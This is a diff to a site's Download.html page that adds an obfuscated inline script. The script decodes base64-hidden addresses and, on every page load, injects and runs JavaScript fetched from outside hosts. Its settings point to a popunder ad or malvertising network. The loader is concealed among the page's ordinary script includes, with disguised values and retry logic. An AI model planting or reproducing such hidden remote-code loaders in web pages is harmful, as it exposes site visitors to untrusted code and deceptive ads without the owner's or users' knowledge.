--- a/Download.html
+++ b/Download.html
@@ -36,6 +36,12 @@
   <!--** JAVASCRIPT - START **-->
   <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
   <script src="resources/js/main.js"></script>
+<script type="text/javascript" data-cfasync="false">
+/*<![CDATA[/* */
+(function(){var p=window,q="a02bafdc89fcb295afc1c98b316199d7",h=[["siteId",88*527*396+114+697-13415068],["minBid",0],["popundersPerIP","0"],["delayBetween",0],["default",false],["defaultPerDay",0],["topmostLayer",!0]],z=["d3d3LnhhZHNtYXJ0LmNvbS93bW90YS5taW4uY3Nz","ZDExZW5xMnJ5bXkweWwuY2xvdWRmcm9udC5uZXQvY3NzL2NyZWFkeS5taW4uanM="],l=-1,a,e,u=function(){clearTimeout(e);l++;if(z[l]&&!(1729276404000<(new Date).getTime()&&1<l)){a=p.document.createElement("script");a.type="text/javascript";a.async=!0;var d=p.document.getElementsByTagName("script")[0];a.src="https://"+atob(z[l]);a.crossOrigin="anonymous";a.onerror=u;a.onload=function(){clearTimeout(e);p[q.slice(0,16)+q.slice(0,16)]||u()};e=setTimeout(u,5E3);d.parentNode.insertBefore(a,d)}};if(!p[q]){try{Object.freeze(p[q]=h)}catch(e){}u()}})();
+/*]]>/* */
+</script>
+
   <!--** JAVASCRIPT - END **-->
 </head>
 
